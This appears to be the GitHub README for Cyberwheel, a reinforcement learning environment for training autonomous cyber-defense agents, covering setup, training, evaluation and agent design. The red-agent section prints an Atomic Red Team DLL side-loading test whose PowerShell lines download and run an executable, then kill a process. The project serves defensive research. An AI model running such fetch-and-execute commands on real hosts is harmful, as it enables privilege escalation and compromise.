ORNL / cyberwheel

MIT License
10 stars 1 forks source link

Issues MIT License


Logo

Cyberwheel

A reinforcement learning simulation environment focused on autonomous cyber defense

Submit Issue

Table of Contents
  1. About Cyberwheel
  2. Getting Started
  3. Usage
  4. License
  5. Contacts

About Cyberwheel

Cyberwheel is a Reinforcement Learning (RL) simulation environment built for training and evaluating autonomous cyber defense models on simulated networks. It was built with modularity in mind, to allow users to build on top of it to fit their needs. It supports various robust configuration files to build networks, services, host types, defensive agents, and more.

Motivations:

This environment contains a training script and evaluation script with a large set of configurable parameters to switch out networks, strategies, episode lengths, and more. It also contains a script to run a dash server that allows for the evaluations to be visualized in a readble graph display showing agent actions througout the episodes.

(back to top)

Built With

(back to top)

Getting Started

Prerequisites

This project runs on, and has been tested with, Python 3.10. Once installed, poetry should automatically use this version for its virtual environment.

Cyberwheel uses poetry to manage and install python packages. For instructions on how to install poetry, visit their installation page.

For the dash server visualization to function, you need graphviz, an open source graph visualization software, installed on your system.

Instructions for installing graphviz can be found in their documentation.

Installation

Once all dependencies are installed:

  1. If you haven't already, clone the cyberwheel repo with HTTPS
    git clone https://github.com/ORNL/cyberwheel.git

    or with SSH:

    git clone git@github.com:ORNL/cyberwheel.git
  2. Install packages and resolve dependencies
    poetry install

On newer OSX systems running on silicone chips, there may be an error installing the pygraphviz package, with poetry not finding the graphviz configuration files. You can work around this by pip installing the pygraphviz package manually, explicitly passing graphviz config paths. This link helped me work through this issue.

(back to top)

Usage

To run any cyberwheel scripts, shell into the poetry virtual environment

poetry shell

When you want to deactivate the environment, you can just hit Ctrl+D. This will exit the virtual environment shell.

Training a model

To train a model on our environment, you can use our training script, train_cyberwheel.py

python3 train_cyberwheel.py

This will run training with default parameters. It will save the model during evaluations in the models/ directory. If tracking to Weights & Biases, the model and its checkpoints will be saved on your W&B project, as well as locally. You can also view real-time training progress on your W&B account.

The script also includes a wide array of configuration options as arguments that can be passed.

Training Parameters

Environment Parameters

Reinforcement Learning Parameters

(back to top)

Evaluating a model

To evaluate a trained model with Cyberwheel, you can use our evaluation script, evaluate_cyberwheel.py

python3 evaluate_cyberwheel.py --experiment [exp-name]

This will run evaluation with default parameters on a trained model by its experiment name. It will load the model from the models/ directory. If tracked to Weights & Biases, the model and its checkpoints can be loaded from your W&B project as well.

The script also includes a wide array of configuration options as arguments that can be passed.

Evaluation Parameters

(back to top)

Visualization

To view the visualizations of the evaluations that were run, you can run the visualization script:

python3 run_visualization_server.py [PORT_NUM]

This will run a dash server locally on the port number passed. You can then visit http://localhost:PORT_NUM/ to access the frontend. From here, you can find the evaluation you ran in the list, and view the network state over the course of each episode with a step slider.

Visualizer GIF

Running a Basic Demo

A basic demonstration of the code can be executed with the following commands:

  1. Train a model and save subsequent model checkpoints in the models/ directory

    python3 train_cyberwheel.py --exp-name example_demo
  2. Evaluate the most recent save of the model example_demo on the environment, and generate a log of the actions at each step to the action_logs/ directory. If you pass --visualize, it will also save graph objects in the graphs/ directory, which are needed for visualizing with our dash server. (NOTE: visualizing can take some time)

    python3 evaluate_cyberwheel.py --experiment example_demo [--visualize]
  3. Run the visualization server on port 8080. When running locally, you can navigate to http://localhost:8080/ on your browser and it should include your experiment name in the list, allowing you to visualize the agent's actions throughout an episode.

    python3 run_visualization_server.py 8080

Cyberwheel Design

Network Design

Networks in Cyberwheel are comprised of routers, subnets, and hosts represented as nodes in a networkx graph​.

Blue Agent Design

The blue agent is largely focused on deploying Decoys to slow and/or stop red agent attacks throughout the network. The blue agent's actions and logic be configured and defined in a YAML file, allowing for greater modularity.

Red Agent Design

The red agent is a heuristic agent that has a set of defined rules and strategies that it can use to traverse a network, although its behavior to dictate which Hosts it chooses to target is modular. It's actions are mapped from MITRE ATT&CK Killchain Phases (Discovery, Lateral Movement, Privilege Escalation, Impact) to Atomic Red Team (ART) techniques. We've defined these techniques with a set of attributes mapped from existing cyber attack data. This allows our ART Agent to run a higher level killchain phase (i.e. discovery) on a host, and the environment will cross-reference the target host's attributes with ART Technique attributes. Techniques are valid for the attack by checking:

If all of these conditions are met, the agent can successfully run the killchain attack on the host. These ART Techniques include Atomic Tests, which give tangible commands to run in order to execute the given attack. With this methodology, the simulator is able to transform a general killchain phase into a valid set of commands that could be run in the real world.

Example

  1. ART Agent runs Privilege Escalation on Host.
  2. ART Agent runs OS, Killchain Phase, and CVE checks.
  3. ART Agent uses ART Technique: DLL Side-Loading Technique
  4. ART Agent chooses a random Atomic Test
  5. Atomic Test adds the following commands to Host metadata:
    New-Item -Type Directory (split-path "${gup_executable}") -ErrorAction ignore | Out-Null​
    Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/bin/GUP.exe?raw=true" -OutFile "${gup_executable}"
    if (Test-Path "${gup_executable}") {exit 0} else {exit 1}​
    "${gup_executable}”​
    taskkill /F /IM ${process_name} >nul 2>&1​

Detectors and Alerts

Red actions produce Alerts which contain information such as the actions's source host, target host, exploited services, and techniques. The blue agent has a detector layer set up with Alerts that detect any red agent action on the network. These detectors can filter out Alerts, add noise, or even create false-positive Alerts. You can use multiple detectors together to capture various red agent behavior. These alerts are then converted into the observation space which the RL agent uses to train.

Configurations

All configurations are stored in the resources/configs directory. You can use config to define blue agents, decoy types, detectors, host types, networks, and services.

Contributing

If you are not familiar with SOLID principles, please read this before contributing. Pretty basic, but makes a huge difference down the road --- Article on SOLID.

If you need to add a dependency, this project is packaged with poetry. Please take a few minutes to read about the basics before adding any dependencies. Do not use pip, do not use requirements.txt. TLDR: use poetry add <dependency name>. After adding your dependency, add and commit the new poetry.lock file.

This project uses pre-commit to automatically run formatting prior to every commit. Pyright is included in this suite and will block your commit if you commit code with bad type labels. If you'd like to skip this check, run SKIP=pyright git commit <rest of commit command>.

If you need to do anything with the networkx graph, write helper functions in the network module (base class where possible) rather than passing the graph around / injecting it wherever possible. Of course you may have to inject the network instance since it holds the state information.

The cyberwheel class that inherits from gym should contain minimal code to keep it clean. If you find yourself writing long code blocks in this file, consider whether they should be moved into another module or class. The same thing goes for the main class --- keep it clean. If you want to add 30 command line args, maybe find a way to parse them using a helper class just to keep that file clean.

Be creative and have fun!

(back to top)

License

Distributed under the MIT License. See LICENSE for more information.

(back to top)

Contacts

Sean Oesch - oeschts@ornl.gov

Cory Watson - watsoncl1@ornl.gov

Amul Chaulagain - chaulagaina@ornl.gov

Matthew Dixson - dixsonmk@ornl.gov

Brian Weber - weberb@ornl.gov

Phillipe Austria - austriaps@ornl.gov

Project Link: https://github.com/ORNL/cyberwheel/

(back to top)

Papers

(2024) Towards a High Fidelity Training Environment for Autonomous Cyber Defense Agents

(2024) The Path to Autonomous Cyber Defense

(back to top)